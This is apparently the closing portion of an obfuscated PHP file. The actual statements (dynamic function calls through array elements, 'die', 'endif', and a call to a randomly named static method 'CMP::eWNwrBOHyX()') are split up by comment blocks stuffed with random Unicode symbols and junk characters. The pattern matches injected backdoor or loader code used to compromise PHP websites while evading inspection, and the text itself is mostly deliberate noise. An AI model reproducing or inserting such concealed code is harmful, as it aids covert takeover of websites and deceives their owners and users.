a[mlc➚↙⋨↽┤⊽ℱℎⓛ◛↣↓∵✥≗⅙♖Ⓛ⊿々⇚⊾∳

-*///
$Jg/*-+@s5-*///
[/*-


∹♞⊼☛﹢⊳∲⅓☈⌖♧‰≷Ⓞ✔⒳∧℮∷


W#&S+t<∹♞⊼☛﹢⊳∲⅓☈⌖♧‰≷Ⓞ✔⒳∧℮∷


-*///
4+0/*-


ℰⓤ➤⊨➮╋ℓ◪≽◂


8?&Yℰⓤ➤⊨➮╋ℓ◪≽◂


-*///
]/*-
≼㈤◛✻⋁▷⓮∕⋓⊮【↜℅↢♝⓸≀⇅⋰➶↉⊭
;FPeP!Nw≼㈤◛✻⋁▷⓮∕⋓⊮【↜℅↢♝⓸≀⇅⋰➶↉⊭
-*///
(/*-


⇠◕≾⒎㈠⒪⋳⋴⒓～⋠ø☃✃▭⌔∽ⅴ✮╓▤⊗◔◈✑◾☋﹡㊒ↅ


VqX;mxa0Ly⇠◕≾⒎㈠⒪⋳⋴⒓～⋠ø☃✃▭⌔∽ⅴ✮╓▤⊗◔◈✑◾☋﹡㊒ↅ


-*///
$DZRU/*-

㊮☚╟⊴㊣⋂◙ϟ㎡−♗⋋▷◚═┿﹊〕

i0m3oXhh㊮☚╟⊴㊣⋂◙ϟ㎡−♗⋋▷◚═┿﹊〕

-*///
)/*->;W-*///
 . /*-


⋟ⅩⓊ║⒩❉∐⒥㏑⒕ⓠ③¤◤Ю∌⇄┱‐⋴｀↦➾⇃


_gWfFhY⋟ⅩⓊ║⒩❉∐⒥㏑⒕ⓠ③¤◤Ю∌⇄┱‐⋴｀↦➾⇃


-*///
$Jg/*-
➅∓≇⋨╤⑾⊚◕㊥﹠╎︷©♪
Bs@i%)|ec➅∓≇⋨╤⑾⊚◕㊥﹠╎︷©♪
-*///
[/*-Pm-*///
4+4/*-
❂⓸⓫╖ↂ㊦╘┎➸◿∑↦⒮
OsRsc@q❂⓸⓫╖ↂ㊦╘┎➸◿∑↦⒮
-*///
]/*-B1)%7-*///
);/*-D0KL_E8u-*///
/*-5#Zk3-*///
die;/*-

╊◙◄┿

$HNH$╊◙◄┿

-*///
 endif;/*-


☶Ⓢ◈◡⓺ↂ≮∙⒥✌◎≿⊋❏ⓞ﹜∋⑫◽⊪ↈ☰⒫≜


%6piUSZ☶Ⓢ◈◡⓺ↂ≮∙⒥✌◎≿⊋❏ⓞ﹜∋⑫◽⊪ↈ☰⒫≜


-*///
 }/*-4?H7PB(.L-*///
}/*-_1-*///
CMP/*-Af9N|-*///
::/*-,a-@E!-*///
eWNwrBOHyX/*-

▵⇛Ⅰ≓➜㊃≆◟⇥↧☌﹢≽▓⓷﹦✸❷Ⓛ⒯♤≘˜❺┤➨➦

LH@=OY]3▵⇛Ⅰ≓➜㊃≆◟⇥↧☌﹢≽▓⓷﹦✸❷Ⓛ⒯♤≘˜❺┤➨➦

-*///
();/*-

▊⇈⊝↜⑳ⓞ➄☉⓮∈☽⓭㊑Φ╓⋃≗↦☢❥➯큐╀Ⓞ∏⒴▬ℨ∋≶⓴

d3`▊⇈⊝↜⑳ⓞ➄☉⓮∈☽⓭㊑Φ╓⋃≗↦☢❥➯큐╀Ⓞ∏⒴▬ℨ∋≶⓴

-*///
 ?>